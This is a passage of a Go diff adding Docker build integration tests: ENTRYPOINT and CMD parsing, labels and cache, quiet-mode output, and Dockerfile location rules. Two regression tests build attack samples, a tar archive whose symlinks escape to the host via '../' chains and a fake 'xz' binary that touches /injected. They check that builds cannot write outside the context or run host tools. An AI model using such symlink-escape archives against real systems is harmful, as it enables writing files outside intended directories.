ENTRYPOINT + if id1, err = buildImage(name, "FROM busybox\nENTRYPOINT [\"echo hi\"]\n", true); err != nil { + c.Fatal(err) + } + + if id2, err = buildImage(name, "FROM busybox\nENTRYPOINT [\"echo\", \"hi\"]\n", true); err != nil { + c.Fatal(err) + } + + if id1 == id2 { + c.Fatal("Should not have resulted in the same ENTRYPOINT") + } + +} + +func (s *DockerSuite) TestBuildCmdJSONNoShDashC(c *check.C) { + name := "testbuildcmdjson" + if _, err := buildImage(name, "FROM busybox\nCMD [\"echo\", \"cmd\"]", true); err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name, "Config.Cmd") + + expected := `["echo","cmd"]` + + if res != expected { + c.Fatalf("Expected value %s not in Config.Cmd: %s", expected, res) + } + +} + +func (s *DockerSuite) TestBuildEntrypointInheritance(c *check.C) { + + if _, err := buildImage("parent", ` + FROM busybox + ENTRYPOINT exit 130 + `, true); err != nil { + c.Fatal(err) + } + + if _, status, _ := dockerCmdWithError("run", "parent"); status != 130 { + c.Fatalf("expected exit code 130 but received %d", status) + } + + if _, err := buildImage("child", ` + FROM parent + ENTRYPOINT exit 5 + `, true); err != nil { + c.Fatal(err) + } + + if _, status, _ := dockerCmdWithError("run", "child"); status != 5 { + c.Fatalf("expected exit code 5 but received %d", status) + } + +} + +func (s *DockerSuite) TestBuildEntrypointInheritanceInspect(c *check.C) { + var ( + name = "testbuildepinherit" + name2 = "testbuildepinherit2" + expected = `["/bin/sh","-c","echo quux"]` + ) + + if daemonPlatform == "windows" { + expected = `["cmd","/S","/C","echo quux"]` + } + + if _, err := buildImage(name, "FROM busybox\nENTRYPOINT /foo/bar", true); err != nil { + c.Fatal(err) + } + + if _, err := buildImage(name2, fmt.Sprintf("FROM %s\nENTRYPOINT echo quux", name), true); err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name2, "Config.Entrypoint") + + if res != expected { + c.Fatalf("Expected value %s not in Config.Entrypoint: %s", expected, res) + } + + out, _ := dockerCmd(c, "run", name2) + + expected = "quux" + + if strings.TrimSpace(out) != expected { + c.Fatalf("Expected output is %s, got %s", expected, out) + } + +} + +func (s *DockerSuite) TestBuildRunShEntrypoint(c *check.C) { + name := "testbuildentrypoint" + _, err := buildImage(name, + `FROM busybox + ENTRYPOINT echo`, + true) + if err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "--rm", name) +} + +func (s *DockerSuite) TestBuildExoticShellInterpolation(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildexoticshellinterpolation" + + _, err := buildImage(name, ` + FROM busybox + + ENV SOME_VAR a.b.c + + RUN [ "$SOME_VAR" = 'a.b.c' ] + RUN [ "${SOME_VAR}" = 'a.b.c' ] + RUN [ "${SOME_VAR%.*}" = 'a.b' ] + RUN [ "${SOME_VAR%%.*}" = 'a' ] + RUN [ "${SOME_VAR#*.}" = 'b.c' ] + RUN [ "${SOME_VAR##*.}" = 'c' ] + RUN [ "${SOME_VAR/c/d}" = 'a.b.d' ] + RUN [ "${#SOME_VAR}" = '5' ] + + RUN [ "${SOME_UNSET_VAR:-$SOME_VAR}" = 'a.b.c' ] + RUN [ "${SOME_VAR:+Version: ${SOME_VAR}}" = 'Version: a.b.c' ] + RUN [ "${SOME_UNSET_VAR:+${SOME_VAR}}" = '' ] + RUN [ "${SOME_UNSET_VAR:-${SOME_VAR:-d.e.f}}" = 'a.b.c' ] + `, false) + if err != nil { + c.Fatal(err) + } + +} + +func (s *DockerSuite) TestBuildVerifySingleQuoteFails(c *check.C) { + // This testcase is supposed to generate an error because the + // JSON array we're passing in on the CMD uses single quotes instead + // of double quotes (per the JSON spec). This means we interpret it + // as a "string" instead of "JSON array" and pass it on to "sh -c" and + // it should barf on it. + name := "testbuildsinglequotefails" + + if _, err := buildImage(name, + `FROM busybox + CMD [ '/bin/sh', '-c', 'echo hi' ]`, + true); err != nil { + c.Fatal(err) + } + + if _, _, err := dockerCmdWithError("run", "--rm", name); err == nil { + c.Fatal("The image was not supposed to be able to run") + } + +} + +func (s *DockerSuite) TestBuildVerboseOut(c *check.C) { + name := "testbuildverboseout" + expected := "\n123\n" + + if daemonPlatform == "windows" { + expected = "\n123\r\n" + } + + _, out, err := buildImageWithOut(name, + `FROM busybox +RUN echo 123`, + false) + + if err != nil { + c.Fatal(err) + } + if !strings.Contains(out, expected) { + c.Fatalf("Output should contain %q: %q", "123", out) + } + +} + +func (s *DockerSuite) TestBuildWithTabs(c *check.C) { + name := "testbuildwithtabs" + _, err := buildImage(name, + "FROM busybox\nRUN echo\tone\t\ttwo", true) + if err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "ContainerConfig.Cmd") + expected1 := `["/bin/sh","-c","echo\tone\t\ttwo"]` + expected2 := `["/bin/sh","-c","echo\u0009one\u0009\u0009two"]` // syntactically equivalent, and what Go 1.3 generates + if daemonPlatform == "windows" { + expected1 = `["cmd","/S","/C","echo\tone\t\ttwo"]` + expected2 = `["cmd","/S","/C","echo\u0009one\u0009\u0009two"]` // syntactically equivalent, and what Go 1.3 generates + } + if res != expected1 && res != expected2 { + c.Fatalf("Missing tabs.\nGot: %s\nExp: %s or %s", res, expected1, expected2) + } +} + +func (s *DockerSuite) TestBuildLabels(c *check.C) { + name := "testbuildlabel" + expected := `{"License":"GPL","Vendor":"Acme"}` + _, err := buildImage(name, + `FROM busybox + LABEL Vendor=Acme + LABEL License GPL`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildLabelsCache(c *check.C) { + name := "testbuildlabelcache" + + id1, err := buildImage(name, + `FROM busybox + LABEL Vendor=Acme`, false) + if err != nil { + c.Fatalf("Build 1 should have worked: %v", err) + } + + id2, err := buildImage(name, + `FROM busybox + LABEL Vendor=Acme`, true) + if err != nil || id1 != id2 { + c.Fatalf("Build 2 should have worked & used cache(%s,%s): %v", id1, id2, err) + } + + id2, err = buildImage(name, + `FROM busybox + LABEL Vendor=Acme1`, true) + if err != nil || id1 == id2 { + c.Fatalf("Build 3 should have worked & NOT used cache(%s,%s): %v", id1, id2, err) + } + + id2, err = buildImage(name, + `FROM busybox + LABEL Vendor Acme`, true) // Note: " " and "=" should be same + if err != nil || id1 != id2 { + c.Fatalf("Build 4 should have worked & used cache(%s,%s): %v", id1, id2, err) + } + + // Now make sure the cache isn't used by mistake + id1, err = buildImage(name, + `FROM busybox + LABEL f1=b1 f2=b2`, false) + if err != nil { + c.Fatalf("Build 5 should have worked: %q", err) + } + + id2, err = buildImage(name, + `FROM busybox + LABEL f1="b1 f2=b2"`, true) + if err != nil || id1 == id2 { + c.Fatalf("Build 6 should have worked & NOT used the cache(%s,%s): %q", id1, id2, err) + } + +} + +func (s *DockerSuite) TestBuildNotVerboseSuccess(c *check.C) { + // This test makes sure that -q works correctly when build is successful: + // stdout has only the image ID (long image ID) and stderr is empty. + var stdout, stderr string + var err error + outRegexp := regexp.MustCompile("^(sha256:|)[a-z0-9]{64}\\n$") + + tt := []struct { + Name string + BuildFunc func(string) + }{ + { + Name: "quiet_build_stdin_success", + BuildFunc: func(name string) { + _, stdout, stderr, err = buildImageWithStdoutStderr(name, "FROM busybox", true, "-q", "--force-rm", "--rm") + }, + }, + { + Name: "quiet_build_ctx_success", + BuildFunc: func(name string) { + ctx, err := fakeContext("FROM busybox", map[string]string{ + "quiet_build_success_fctx": "test", + }) + if err != nil { + c.Fatalf("Failed to create context: %s", err.Error()) + } + defer ctx.Close() + _, stdout, stderr, err = buildImageFromContextWithStdoutStderr(name, ctx, true, "-q", "--force-rm", "--rm") + }, + }, + { + Name: "quiet_build_git_success", + BuildFunc: func(name string) { + git, err := newFakeGit("repo", map[string]string{ + "Dockerfile": "FROM busybox", + }, true) + if err != nil { + c.Fatalf("Failed to create the git repo: %s", err.Error()) + } + defer git.Close() + _, stdout, stderr, err = buildImageFromGitWithStdoutStderr(name, git, true, "-q", "--force-rm", "--rm") + + }, + }, + } + + for _, te := range tt { + te.BuildFunc(te.Name) + if err != nil { + c.Fatalf("Test %s shouldn't fail, but got the following error: %s", te.Name, err.Error()) + } + if outRegexp.Find([]byte(stdout)) == nil { + c.Fatalf("Test %s expected stdout to match the [%v] regexp, but it is [%v]", te.Name, outRegexp, stdout) + } + + if stderr != "" { + c.Fatalf("Test %s expected stderr to be empty, but it is [%#v]", te.Name, stderr) + } + } + +} + +func (s *DockerSuite) TestBuildNotVerboseFailureWithNonExistImage(c *check.C) { + // This test makes sure that -q works correctly when build fails by + // comparing between the stderr output in quiet mode and in stdout + // and stderr output in verbose mode + testRequires(c, Network) + testName := "quiet_build_not_exists_image" + buildCmd := "FROM busybox11" + _, _, qstderr, qerr := buildImageWithStdoutStderr(testName, buildCmd, false, "-q", "--force-rm", "--rm") + _, vstdout, vstderr, verr := buildImageWithStdoutStderr(testName, buildCmd, false, "--force-rm", "--rm") + if verr == nil || qerr == nil { + c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", testName)) + } + if qstderr != vstdout+vstderr { + c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", testName, qstderr, vstdout+vstderr)) + } +} + +func (s *DockerSuite) TestBuildNotVerboseFailure(c *check.C) { + // This test makes sure that -q works correctly when build fails by + // comparing between the stderr output in quiet mode and in stdout + // and stderr output in verbose mode + tt := []struct { + TestName string + BuildCmds string + }{ + {"quiet_build_no_from_at_the_beginning", "RUN whoami"}, + {"quiet_build_unknown_instr", "FROMD busybox"}, + } + + for _, te := range tt { + _, _, qstderr, qerr := buildImageWithStdoutStderr(te.TestName, te.BuildCmds, false, "-q", "--force-rm", "--rm") + _, vstdout, vstderr, verr := buildImageWithStdoutStderr(te.TestName, te.BuildCmds, false, "--force-rm", "--rm") + if verr == nil || qerr == nil { + c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", te.TestName)) + } + if qstderr != vstdout+vstderr { + c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", te.TestName, qstderr, vstdout+vstderr)) + } + } +} + +func (s *DockerSuite) TestBuildNotVerboseFailureRemote(c *check.C) { + // This test ensures that when given a wrong URL, stderr in quiet mode and + // stderr in verbose mode are identical. + // TODO(vdemeester) with cobra, stdout has a carriage return too much so this test should not check stdout + URL := "http://something.invalid" + Name := "quiet_build_wrong_remote" + _, _, qstderr, qerr := buildImageWithStdoutStderr(Name, "", false, "-q", "--force-rm", "--rm", URL) + _, _, vstderr, verr := buildImageWithStdoutStderr(Name, "", false, "--force-rm", "--rm", URL) + if qerr == nil || verr == nil { + c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", Name)) + } + if qstderr != vstderr { + c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", Name, qstderr, vstderr)) + } +} + +func (s *DockerSuite) TestBuildStderr(c *check.C) { + // This test just makes sure that no non-error output goes + // to stderr + name := "testbuildstderr" + _, _, stderr, err := buildImageWithStdoutStderr(name, + "FROM busybox\nRUN echo one", true) + if err != nil { + c.Fatal(err) + } + + if runtime.GOOS == "windows" && + daemonPlatform != "windows" { + // Windows to non-Windows should have a security warning + if !strings.Contains(stderr, "SECURITY WARNING:") { + c.Fatalf("Stderr contains unexpected output: %q", stderr) + } + } else { + // Other platform combinations should have no stderr written too + if stderr != "" { + c.Fatalf("Stderr should have been empty, instead it's: %q", stderr) + } + } +} + +func (s *DockerSuite) TestBuildChownSingleFile(c *check.C) { + testRequires(c, UnixCli) // test uses chown: not available on windows + testRequires(c, DaemonIsLinux) + + name := "testbuildchownsinglefile" + + ctx, err := fakeContext(` +FROM busybox +COPY test / +RUN ls -l /test +RUN [ $(ls -l /test | awk '{print $3":"$4}') = 'root:root' ] +`, map[string]string{ + "test": "test", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if err := os.Chown(filepath.Join(ctx.Dir, "test"), 4242, 4242); err != nil { + c.Fatal(err) + } + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + +} + +func (s *DockerSuite) TestBuildSymlinkBreakout(c *check.C) { + name := "testbuildsymlinkbreakout" + tmpdir, err := ioutil.TempDir("", name) + c.Assert(err, check.IsNil) + defer os.RemoveAll(tmpdir) + ctx := filepath.Join(tmpdir, "context") + if err := os.MkdirAll(ctx, 0755); err != nil { + c.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(ctx, "Dockerfile"), []byte(` + from busybox + add symlink.tar / + add inject /symlink/ + `), 0644); err != nil { + c.Fatal(err) + } + inject := filepath.Join(ctx, "inject") + if err := ioutil.WriteFile(inject, nil, 0644); err != nil { + c.Fatal(err) + } + f, err := os.Create(filepath.Join(ctx, "symlink.tar")) + if err != nil { + c.Fatal(err) + } + w := tar.NewWriter(f) + w.WriteHeader(&tar.Header{ + Name: "symlink2", + Typeflag: tar.TypeSymlink, + Linkname: "/../../../../../../../../../../../../../../", + Uid: os.Getuid(), + Gid: os.Getgid(), + }) + w.WriteHeader(&tar.Header{ + Name: "symlink", + Typeflag: tar.TypeSymlink, + Linkname: filepath.Join("symlink2", tmpdir), + Uid: os.Getuid(), + Gid: os.Getgid(), + }) + w.Close() + f.Close() + if _, err := buildImageFromContext(name, fakeContextFromDir(ctx), false); err != nil { + c.Fatal(err) + } + if _, err := os.Lstat(filepath.Join(tmpdir, "inject")); err == nil { + c.Fatal("symlink breakout - inject") + } else if !os.IsNotExist(err) { + c.Fatalf("unexpected error: %v", err) + } +} + +func (s *DockerSuite) TestBuildXZHost(c *check.C) { + // /usr/local/sbin/xz gets permission denied for the user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + name := "testbuildxzhost" + + ctx, err := fakeContext(` +FROM busybox +ADD xz /usr/local/sbin/ +RUN chmod 755 /usr/local/sbin/xz +ADD test.xz / +RUN [ ! -e /injected ]`, + map[string]string{ + "test.xz": "\xfd\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00" + + "\x21\x01\x16\x00\x00\x00\x74\x2f\xe5\xa3\x01\x00\x3f\xfd" + + "\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00\x21", + "xz": "#!/bin/sh\ntouch /injected", + }) + + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + +} + +func (s *DockerSuite) TestBuildVolumesRetainContents(c *check.C) { + // /foo/file gets permission denied for the user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) // TODO Windows: Issue #20127 + var ( + name = "testbuildvolumescontent" + expected = "some text" + volName = "/foo" + ) + + if daemonPlatform == "windows" { + volName = "C:/foo" + } + + ctx, err := fakeContext(` +FROM busybox +COPY content /foo/file +VOLUME `+volName+` +CMD cat /foo/file`, + map[string]string{ + "content": expected, + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, false); err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--rm", name) + if out != expected { + c.Fatalf("expected file contents for /foo/file to be %q but received %q", expected, out) + } + +} + +func (s *DockerSuite) TestBuildRenamedDockerfile(c *check.C) { + + ctx, err := fakeContext(`FROM busybox + RUN echo from Dockerfile`, + map[string]string{ + "Dockerfile": "FROM busybox\nRUN echo from Dockerfile", + "files/Dockerfile": "FROM busybox\nRUN echo from files/Dockerfile", + "files/dFile": "FROM busybox\nRUN echo from files/dFile", + "dFile": "FROM busybox\nRUN echo from dFile", + "files/dFile2": "FROM busybox\nRUN echo from files/dFile2", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".") + if err != nil { + c.Fatalf("Failed to build: %s\n%s", out, err) + } + if !strings.Contains(out, "from Dockerfile") { + c.Fatalf("test1 should have used Dockerfile, output:%s", out) + } + + out, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-f", filepath.Join("files", "Dockerfile"), "-t", "test2", ".") + if err != nil { + c.Fatal(err) + } + if !strings.Contains(out, "from files/Dockerfile") { + c.Fatalf("test2 should have used files/Dockerfile, output:%s", out) + } + + out, _, err = dockerCmdInDir(c, ctx.Dir, "build", fmt.Sprintf("--file=%s", filepath.Join("files", "dFile")), "-t", "test3", ".") + if err != nil { + c.Fatal(err) + } + if !strings.Contains(out, "from files/dFile") { + c.Fatalf("test3 should have used files/dFile, output:%s", out) + } + + out, _, err = dockerCmdInDir(c, ctx.Dir, "build", "--file=dFile", "-t", "test4", ".") + if err != nil { + c.Fatal(err) + } + if !strings.Contains(out, "from dFile") { + c.Fatalf("test4 should have used dFile, output:%s", out) + } + + dirWithNoDockerfile, err := ioutil.TempDir(os.TempDir(), "test5") + c.Assert(err, check.IsNil) + nonDockerfileFile := filepath.Join(dirWithNoDockerfile, "notDockerfile") + if _, err = os.Create(nonDockerfileFile); err != nil { + c.Fatal(err) + } + out, _, err = dockerCmdInDir(c, ctx.Dir, "build", fmt.Sprintf("--file=%s", nonDockerfileFile), "-t", "test5", ".") + + if err == nil { + c.Fatalf("test5 was supposed to fail to find passwd") + } + + if expected := fmt.Sprintf("The Dockerfile (%s) must be within the build context (.)", nonDockerfileFile); !strings.Contains(out, expected) { + c.Fatalf("wrong error message:%v\nexpected to contain=%v", out, expected) + } + + out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join("..", "Dockerfile"), "-t", "test6", "..") + if err != nil { + c.Fatalf("test6 failed: %s", err) + } + if !strings.Contains(out, "from Dockerfile") { + c.Fatalf("test6 should have used root Dockerfile, output:%s", out) + } + + out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join(ctx.Dir, "files", "Dockerfile"), "-t", "test7", "..") + if err != nil { + c.Fatalf("test7 failed: %s", err) + } + if !strings.Contains(out, "from files/Dockerfile") { + c.Fatalf("test7 should have used files Dockerfile, output:%s", out) + } + + out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join("..", "Dockerfile"), "-t", "test8", ".") + if err == nil || !strings.Contains(out, "must be within the build context") { + c.Fatalf("test8 should have failed with Dockerfile out of context: %s", err) + } + + tmpDir := os.TempDir() + out, _, err = dockerCmdInDir(c, tmpDir, "build", "-t", "test9", ctx.Dir) + if err != nil { + c.Fatalf("test9 - failed: %s", err) + } + if !strings.Contains(out, "from Dockerfile") { + c.Fatalf("test9 should have used root Dockerfile, output:%s", out) + } + + out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", "dFile2", "-t", "test10", ".") + if err != nil { + c.Fatalf("test10 should have worked: %s", err) + } + if !strings.Contains(out, "from files/dFile2") { + c.Fatalf("test10 should have used files/dFile2, output:%s", out) + } + +} + +func (s *DockerSuite) TestBuildFromMixedcaseDockerfile(c *check.C) { + testRequires(c, UnixCli) // Dockerfile overwrites dockerfile on windows + testRequires(c, DaemonIsLinux) + + ctx, err := fakeContext(`FROM busybox + RUN echo from dockerfile`, + map[string]string{ + "dockerfile": "FROM busybox\nRUN echo from dockerfile", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".") + if err != nil { + c.Fatalf("Failed to build: %s\n%s", out, err) + } + + if !strings.Contains(out, "from dockerfile") { + c.Fatalf("Missing proper output: %s", out) + } + +} + +func (s *DockerSuite) TestBuildWithTwoDockerfiles(c *check.C) { + testRequires(c, UnixCli) // Dockerfile overwrites dockerfile on windows + testRequires(c, DaemonIsLinux) + + ctx, err := fakeContext(`FROM busybox +RUN echo from Dockerfile`, + map[string]string{ + "dockerfile": "FROM busybox\nRUN echo from dockerfile", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".") + if err != nil { + c.Fatalf("Failed to build: %s\n%s", out, err) + } + + if !strings.Contains(out, "from Dockerfile") { + c.Fatalf("Missing proper output: %s", out) + } + +} + +func (s *DockerSuite) TestBuildFromURLWithF(c *check.C) { + server, err := fakeStorage(map[string]string{"baz": `FROM busybox +RUN echo from baz +COPY * /tmp/ +RUN find /tmp/`}) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + ctx, err := fakeContext(`FROM busybox +RUN echo from Dockerfile`, + map[string]string{}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + // Make sure that -f is ignored and that we don't use the Dockerfile + // that's in the current dir + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-f", "baz", "-t", "test1", server.URL()+"/baz") + if err != nil { + c.Fatalf("Failed to build: %s\n%s", out, err) + } + + if !strings.Contains(out, "from baz") || + strings.Contains(out, "/tmp/baz") || + !strings.Contains(out, "/tmp/Dockerfile") { + c.Fatalf("Missing proper output: %s", out) + } + +} + +func (s *DockerSuite) TestBuildFromStdinWithF(c *check.C) { + testRequires(c, DaemonIsLinux) // TODO Windows: This test is flaky; no idea why + ctx, err := fakeContext(`FROM busybox +RUN echo "from Dockerfile"`, + map[string]string{}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + // Make sure that -f is ignored and that we don't use the Dockerfile + // that's in the current dir + dockerCommand := exec.Command(dockerBinary, "build", "-f", "baz", "-t", "test1", "-") + dockerCommand.Dir = ctx.Dir + dockerCommand.Stdin = strings.NewReader(`FROM busybox +RUN echo "from baz" +COPY * /tmp/ +RUN sh -c "find /tmp/" # sh -c is needed on Windows to use the correct find`) + out, status, err := runCommandWithOutput(dockerCommand) + if err != nil || status != 0 { + c.Fatalf("Error building: %s", err) + } + + if !strings.Contains(out, "from baz") || + strings.Contains(out, "/tmp/baz") || + !strings.Contains(out, "/tmp/Dockerfile") { + c.Fatalf("Missing proper output: %s", out) + } + +} + +func (s *DockerSuite) TestBuildFromOfficialNames(c *check.C) { + name := "testbuildfromofficial" + fromNames := []string{ + "busybox", + "docker.io/busybox", + "index.docker.io/busybox", + "library/busybox", + "docker.io/library/busybox", + "index.docker.io/library/busybox", + } + for idx, fromName := range fromNames { + imgName := fmt.Sprintf("%s%d", name, idx) + _, err := buildImage(imgName, "FROM "+fromName, true) + if err != nil { + c.Errorf("Build failed using FROM %s: %s", fromName, err) + } + deleteImages(imgName) + } +} + +func (s *DockerSuite) TestBuildDockerfileOutsideContext(c *check.C) { + testRequires(c, UnixCli) // uses os.Symlink: not implemented in windows at the time of writing (go-1.4.2) + testRequires(c, DaemonIsLinux) + + name := "testbuilddockerfileoutsidecontext" + tmpdir, err := ioutil.TempDir("", name) + c.Assert(err, check.IsNil) + defer os.RemoveAll(tmpdir) + ctx := filepath.Join(tmpdir, "context") + if err := os.MkdirAll(ctx, 0755); err != nil { + c.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(ctx, "Dockerfile"), []byte("FROM scratch\nENV X Y"), 0644); err != nil { + c.Fatal(err) + } + wd, err := os.Getwd() + if err != nil { + c.Fatal(err) + } + defer os.Chdir(wd) + if err := os.Chdir(ctx); err != nil { + c.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(tmpdir, "outsideDockerfile"), []byte("FROM scratch\nENV x y"), 0644); err != nil { + c.Fatal(err) + } + if err := os.Symlink(filepath.Join("..", "outsideDockerfile"), filepath.Join(ctx, "dockerfile1")); err != nil { + c.Fatal(err) + } + if err := os.Symlink(filepath.Join(tmpdir, "outsideDockerfile"), filepath.Join(ctx, "dockerfile2")); err != nil { + c.Fatal(err) + } + + for _, dockerfilePath := range []string{ + filepath.Join("..", "outsideDockerfile"), + filepath.Join(ctx, "dockerfile1"), + filepath.Join(ctx, "dockerfile2"), + } { + result := dockerCmdWithResult("build", "-t", name, "--no-cache", "-f", dockerfilePath, ".") + c.Assert(result, icmd.Matches, icmd.Expected{ + Err: "must be within the build context", + ExitCode: 1, + }) + deleteImages(name) + } + + os.Chdir(tmpdir) + + // Path to Dockerfile should be resolved relative to working directory, not relative to context. + // There is a Dockerfile in the context, but since there is no Dockerfile in the current directory, the following should fail + out, _, err := dockerCmdWithError("build", "-t", name, "--no-cache", "-f", "Dockerfile", ctx) + if err == nil { + c.Fatalf("Expected error. Out: %s", out) + } +} + +func (s *DockerSuite) TestBuildSpaces(c *check.C) { + // Test to make sure that leading/trailing spaces on a command + // doesn't change the error msg we get + var ( + err1 error + err2 error + ) + + name := "testspaces" + ctx, err := fakeContext("FROM busybox\nCOPY\n", + map[string]string{ + "Dockerfile": "FROM busybox\nCOPY\n", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err1 = buildImageFromContext(name, ctx, false); err1 == nil { + c.Fatal("Build 1 was supposed to fail, but didn't") + } + + ctx.Add("Dockerfile", "FROM busybox\nCOPY ") + if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil { + c.Fatal("Build 2 was supposed to fail, but didn't") + } + + removeLogTimestamps := func(s string) string { + return regexp.MustCompile(`time="(.*?)"`).ReplaceAllString(s, `time=[TIMESTAMP]`) + } + + // Skip over the times + e1 := removeLogTimestamps(err1.Error()) + e2 := removeLogTimestamps(err2.Error()) + + // Ignore whitespace since that's what were verifying doesn't change stuff + if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { + c.Fatalf("Build 2's error wasn't the same as build 1's\n1:%s\n2:%s", err1, err2) + } + + ctx.Add("Dockerfile", "FROM busybox\n COPY") + if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil { + c.Fatal("Build 3 was supposed to fail, but didn't") + } + + // Skip over the times + e1 = removeLogTimestamps(err1.Error()) + e2 = removeLogTimestamps(err2.Error()) + + // Ignore whitespace since that's what were verifying doesn't change stuff + if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { + c.Fatalf("Build 3's error wasn't the same as build 1's\n1:%s\n3:%s", err1, err2) + } + + ctx.Add("Dockerfile", "FROM busybox\n COPY ") + if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil { + c.Fatal("Build 4 was supposed to fail, but didn't") + } + + // Skip over the times + e1 = removeLogTimestamps(err1.Error()) + e2 = removeLogTimestamps(err2.Error()) + + // Ignore whitespace since that's what were verifying doesn't change stuff + if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { + c.Fatalf("Build 4's error wasn't the same as build 1's\n1:%s\n4:%s", err1, err2) + } + +} + +func (s *DockerSuite) TestBuildSpacesWithQuotes(c *check.C) { + // Test to make sure that spaces in quotes aren't lost + name := "testspacesquotes" + + dockerfile := `FROM busybox +RUN echo " \ + foo "` + + _, out, err := buildImageWithOut(name, dockerfile, false) + if err != nil { + c.Fatal("Build failed:", err) + } + + expecting := "\n foo \n" + // Windows uses the builtin echo, which preserves quotes + if daemonPlatform == "windows" { + expecting = "\" foo \"" + } + if !strings.Contains(out, expecting) { + c.Fatalf("Bad output: %q expecting to contain %q", out, expecting) + } + +} + +// #4393 +func (s *DockerSuite) TestBuildVolumeFileExistsinContainer(c *check.C) { + testRequires(c, DaemonIsLinux) // TODO Windows: This should error out + buildCmd := exec.Command(dockerBinary, "build", "-t", "docker-test-errcreatevolumewithfile", "-") + buildCmd.Stdin = strings.NewReader(` + FROM busybox + RUN touch /foo + VOLUME /foo + `) + + out, _, err := runCommandWithOutput(buildCmd) + if err == nil || !strings.Contains(out, "file exists") { + c.Fatalf("expected build to fail when file exists in container at requested volume path") + } + +} + +func (s *DockerSuite) TestBuildMissingArgs(c *check.C) { + // Test to make sure that all Dockerfile commands (except the ones listed + // in skipCmds) will generate an error if no args are provided. + // Note: INSERT is deprecated so we exclude it because of that. + skipCmds := map[string]struct{}{ + "CMD": {}, + "RUN": {}, + "ENTRYPOINT": {}, + "INSERT": {}, + } + + if daemonPlatform == "windows" { + skipCmds = map[string]struct{}{ + "CMD": {}, + "RUN": {}, + "ENTRYPOINT": {}, + "INSERT": {}, + "STOPSIGNAL": {}, + "ARG": {}, + "USER": {}, + "EXPOSE": {}, + } + } + + for cmd := range command.Commands { + cmd = strings.ToUpper(cmd) + if _, ok := skipCmds[cmd]; ok { + continue + } + + var dockerfile string + if cmd == "FROM" { + dockerfile = cmd + } else { + // Add FROM to make sure we don't complain about it missing + dockerfile = "FROM busybox\n" + cmd + } + + ctx, err := fakeContext(dockerfile, map[string]string{}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + var out string + if out, err = buildImageFromContext("args", ctx, true); err == nil { + c.Fatalf("%s was supposed to fail. Out:%s", cmd, out) + } + if !strings.Contains(err.Error(), cmd+" requires") { + c.Fatalf("%s returned the wrong type of error:%s", cmd, err) + } + } + +} + +func (s *DockerSuite) TestBuildEmptyScratch(c *check.C) { + testRequires(c, DaemonIsLinux) + _, out, err := buildImageWithOut("sc", "FROM scratch", true) + if err == nil { + c.Fatalf("Build was supposed to fail") + } + if !strings.Contains(out, "No image was generated") { + c.Fatalf("Wrong error message: %v", out) + } +} + +func (s *DockerSuite) TestBuildDotDotFile(c *check.C) { + ctx, err := fakeContext("FROM busybox\n", + map[string]string{ + "..gitme": "", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err = buildImageFromContext("sc", ctx, false); err != nil { + c.Fatalf("Build was supposed to work: %s", err) + } +} + +func (s *DockerSuite) TestBuildRUNoneJSON(c *check.C) { + testRequires(c, DaemonIsLinux) // No hello-world Windows image + name := "testbuildrunonejson" + + ctx, err := fakeContext(`FROM hello-world:frozen +RUN [ "/hello" ]`, map[string]string{}) + 